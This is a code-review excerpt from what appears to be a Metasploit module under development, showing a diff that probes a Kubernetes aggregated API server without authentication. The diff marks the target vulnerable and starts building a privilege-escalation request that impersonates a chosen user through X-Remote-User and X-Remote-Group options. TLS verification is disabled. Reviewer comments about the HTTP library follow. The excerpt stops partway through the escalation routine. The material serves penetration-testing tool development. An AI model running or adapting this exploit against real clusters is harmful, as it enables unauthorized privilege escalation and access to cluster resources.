modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.rb

```diff
@@ -0,0 +1,151 @@
+        OptString.new('API_SERVER', [ true, 'Kubernetes cluster API Server HOST/FQDN/IP Address', nil ]),
+        OptString.new('API_RESOURCE_NAME', [ true, 'Kubernetes API Resource name (pods, nodes, servicebindings, seeds, shoots etc)', nil ]),
+        OptString.new('NAMESPACE', [ false, 'Kubernetes namespace to get api-resource details from', nil ]),
+        OptString.new('X-Remote-User', [ true, 'Kubernetes User to escalate', nil ]),
+        OptString.new('X-Remote-Group', [ false, 'Kubernetes Group', nil ])
+      ])
+    deregister_options('RHOST')
+  end
+
+  def check
+    host = datastore['API_SERVER']
+    port = datastore['RPORT']
+    api_ver = datastore['AGGREGATED_API'].split('.')[0]
+    aggr_api = datastore['AGGREGATED_API'].split('.',2)[1]
+    if port != 443
+      req_str = "https://#{host}:#{port}/apis/#{aggr_api}/#{api_ver}"
+    else
+      req_str = "https://#{host}/apis/#{aggr_api}/#{api_ver}"
+    end
+    print_status("Checking the presence of Aggregated API\n#{datastore['AGGREGATED_API']}")
+    Net::HTTP.start(host, port, :use_ssl => 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
+      check_uri = URI(req_str)
+      ws_req = Net::HTTP::Get.new check_uri
+      ws_req.add_field("User-Agent", "kubectl")
+      ws_req.add_field("Upgrade", "WebSocket")
+      ws_req.add_field("Connection", "upgrade")
+      print_status("Sending WebSocket request to API Server\n#{req_str}")
+
+      ws_resp = http.request ws_req
+      if ws_resp.code =~ /200/
+        print_good("Found aggregated API Server \"#{datastore['AGGREGATED_API']}\" in the cluster")
+        ws_data = JSON.parse(ws_resp.body)
+        print_status("Response\n#{JSON.pretty_generate(ws_data)}")
+        http.finish
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_error("Aggregated API Server \"#{datastore['AGGREGATED_API']}\" not found")
+        http.finish
+        return Exploit::CheckCode::Safe
+      end
+    end
+  end
+
+  def privesc_request(host, port, aggr_api, api_ver)
+    rsource = datastore['API_RESOURCE_NAME']
+    if port != 443
+      ws_req_str = "https://#{host}:#{port}/apis/#{aggr_api}/#{api_ver}"
+      if datastore['NAMESPACE']
+        pod_req_str = "https://#{host}:#{port}/apis/#{aggr_api}/#{api_ver}/namespaces/#{datastore['NAMESPACE']}/#{rsource}"
+      else
+        pod_req_str = "https://#{host}:#{port}/apis/#{aggr_api}/#{api_ver}/#{rsource}"
+      end
+    else
+      ws_req_str = "https://#{host}/apis/#{aggr_api}/#{api_ver}"
+      if datastore['NAMESPACE']
+        pod_req_str = "https://#{host}/apis/#{aggr_api}/#{api_ver}/namespaces/#{datastore['NAMESPACE']}/#{rsource}"
+      else
+        pod_req_str = "https://#{host}/apis/#{aggr_api}/#{api_ver}/#{rsource}"
+      end
+    end
+
+    Net::HTTP.start(host, port, :use_ssl => 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
```

Comment:
Use `send_request_cgi`

Reply:
@Green-m does using send_request_cgi support persistent connection and verify_mode = OpenSSL::SSL::VERIFY_NONE

Reply:
@Green-m any inputs, or can I go ahead and mark them as resolved. send_request_cgi does not suffice the requirements
- persistent connection
- OpenSSL::SSL::VERIFY_NONE

Reply:
@Green-m Thank you for the tips, will try out above options. keep-alive is for persitense but  using connection header for different purpose, "Connection: upgrade". Probably cannot use keep-alive, upgrade in single request, let me try.